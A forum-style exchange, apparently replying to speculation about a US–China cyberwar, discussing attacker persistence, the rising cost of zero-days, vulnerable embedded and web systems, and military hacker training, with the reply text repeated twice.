For every hack we hear about there are many hacks we don’t hear about. When you break into an adversary’s computer network the first thing you want to do is establish persistence. Most of those hacks we don’t hear about probably establish persistence. I would be surprised if China and the United States hadn’t established persistence in most of each others’ critical systems.
You may have misspoken, but this sounds confused. If you’re just attempting to accomplish one thing and don’t intend to come back to use their systems again, persistence strictly makes you easier to detect because it involve planting some kind of C2/agent software, generating new creds/tickets, or placing some intentional vulnerability that someone at the organization may eventually stumble upon. It’s only if you’re planning on exploiting the same thing over and over, that it’s safer and cheaper to establish persistence. Planting stealthy persistence in really “core” systems that are part of an intranet and aren’t just directly connected to the web is actually a bit of an engineering challenge, although I would say it’s one that favors attackers, especially nation state attackers or nolifers that can develop their own tooling.
In the event of a hot war between the United States and China, both sides will burn most of their zero-days immediately to cause as much disruption to the enemy as possible. It takes a lot of work to clean a hacker out of one of your systems. The cyber onslaught will probably overwhelm both sides’ ability to reset their software. They will have to focus on the most critical systems of all: communications.
It’s really hard to predict things about cybersecurity 30+ years into the future, but this is probably anachronistic. Just over the last 5-10 years, zero day vulnerabilities for popular platforms like Windows, Linux, Android, and iOS have been monotonically increasing in complexity and cost to build. In recent years especially, the response by the big vendors like Apple to new zero days developed by security researchers or found in the wild has been pretty serious. Broad mitigations and defense in depth have turned a one genius & 3 month problem into a five genius & 6 month problem. In thirty years, assuming we aren’t using completely different computing platforms, making the traditional zero-click 0days will be virtually impossible.
At least for now I am worried about:
Traditional “assume breach” models of security that protect things like corporate AD evironments. Malware & C2 developers have always been ahead of defensive solutions in this arena and I can’t see any reason that will stop being the case in the future.
The proliferation of critical embedded systems that, for performance reasons, won’t have the same memory protections that larger devices are getting. Router & “IoT” RCEs have remained at the same ~10k$ price for nearly fifteen years because anybody with decent systems understanding and >135 IQ can make one in a few weeks.
Application-specific web vulnerabilities. So far the web has been almost a perpetual minefield of new classes of bugs, to the point where I think it’s getting beyond reasonable to expect most web developers to have a good understanding of them. And web interfaces are starting to get put on nearly every system of importance, so as a result nearly everything is becoming vulnerable.
The rise of waterholing attacks that amplify all of the above by infecting important downstream libraries/ubiquitous system software/etc.
The interesting thing about these techniques though is that they look a lot less like “nuclear”-0days that are developed by John Von Neumann and can just be used to break into anything, than “conventional” attacks. In the outbreak of a conventional war where both sides are directly targeting civilian infrastructure, cell towers, etc. of large technologically advanced nations, this makes the battle a lot more numbers heavy than I think either side will be anticipating. The situation right now is a little like if we had invented fighter jets after nuclear bombs; sometimes I imagine larger nation states might have developed TOPGUN-style A-teams to use sparingly but seen little point in training large cadres of F-35 pilots as a precaution for a hot war, because they’ve never known a hot war from a peer adversary while the tech existed. I think the military is making a serious mistake in not training reserves of B-tier computer hackers for a situation like this, where we’re just trying to sabotage & protect as much as we can. If neither side figures this out, I would expect lots of low value targets to stay in place, at least at the start of the war.
I expect all but the most secure systems (think “US president’s personal phone”) will be entirely compromised. However, there are many ways to communicate. Both sides can improvise. Since secondary channels abound, it might be better just to spy on enemy communications instead of breaking them.
To be clear, if they literally took out the internet, the U.S. and China can still use specialized assisted-theorem-proven devices to transmit & receive AES-encrypted numbers over radio, WW2 style. Semi “proven-safe” code already exists for some much more complicated weapon systems in planes and helicopters and I expect that a lot of it is actually secure. Those communication platforms will probably be the simplest information system for a competent military to keep safe from hackers in a wartime environment.
You may have misspoken, but this sounds confused. If you’re just attempting to accomplish one thing and don’t intend to come back to use their systems again, persistence strictly makes you easier to detect because it involve planting some kind of C2/agent software, generating new creds/tickets, or placing some intentional vulnerability that someone at the organization may eventually stumble upon. It’s only if you’re planning on exploiting the same thing over and over, that it’s safer and cheaper to establish persistence. Planting stealthy persistence in really “core” systems that are part of an intranet and aren’t just directly connected to the web is actually a bit of an engineering challenge, although I would say it’s one that favors attackers, especially nation state attackers or nolifers that can develop their own tooling.
It’s really hard to predict things about cybersecurity 30+ years into the future, but this is probably anachronistic. Just over the last 5-10 years, zero day vulnerabilities for popular platforms like Windows, Linux, Android, and iOS have been monotonically increasing in complexity and cost to build. In recent years especially, the response by the big vendors like Apple to new zero days developed by security researchers or found in the wild has been pretty serious. Broad mitigations and defense in depth have turned a one genius & 3 month problem into a five genius & 6 month problem. In thirty years, assuming we aren’t using completely different computing platforms, making the traditional zero-click 0days will be virtually impossible.
At least for now I am worried about:
Traditional “assume breach” models of security that protect things like corporate AD evironments. Malware & C2 developers have always been ahead of defensive solutions in this arena and I can’t see any reason that will stop being the case in the future.
The proliferation of critical embedded systems that, for performance reasons, won’t have the same memory protections that larger devices are getting. Router & “IoT” RCEs have remained at the same ~10k$ price for nearly fifteen years because anybody with decent systems understanding and >135 IQ can make one in a few weeks.
Application-specific web vulnerabilities. So far the web has been almost a perpetual minefield of new classes of bugs, to the point where I think it’s getting beyond reasonable to expect most web developers to have a good understanding of them. And web interfaces are starting to get put on nearly every system of importance, so as a result nearly everything is becoming vulnerable.
The rise of waterholing attacks that amplify all of the above by infecting important downstream libraries/ubiquitous system software/etc.
The interesting thing about these techniques though is that they look a lot less like “nuclear”-0days that are developed by John Von Neumann and can just be used to break into anything, than “conventional” attacks. In the outbreak of a conventional war where both sides are directly targeting civilian infrastructure, cell towers, etc. of large technologically advanced nations, this makes the battle a lot more numbers heavy than I think either side will be anticipating. The situation right now is a little like if we had invented fighter jets after nuclear bombs; sometimes I imagine larger nation states might have developed TOPGUN-style A-teams to use sparingly but seen little point in training large cadres of F-35 pilots as a precaution for a hot war, because they’ve never known a hot war from a peer adversary while the tech existed. I think the military is making a serious mistake in not training reserves of B-tier computer hackers for a situation like this, where we’re just trying to sabotage & protect as much as we can. If neither side figures this out, I would expect lots of low value targets to stay in place, at least at the start of the war.
To be clear, if they literally took out the internet, the U.S. and China can still use specialized assisted-theorem-proven devices to transmit & receive AES-encrypted numbers over radio, WW2 style. Semi “proven-safe” code already exists for some much more complicated weapon systems in planes and helicopters and I expect that a lot of it is actually secure. Those communication platforms will probably be the simplest information system for a competent military to keep safe from hackers in a wartime environment.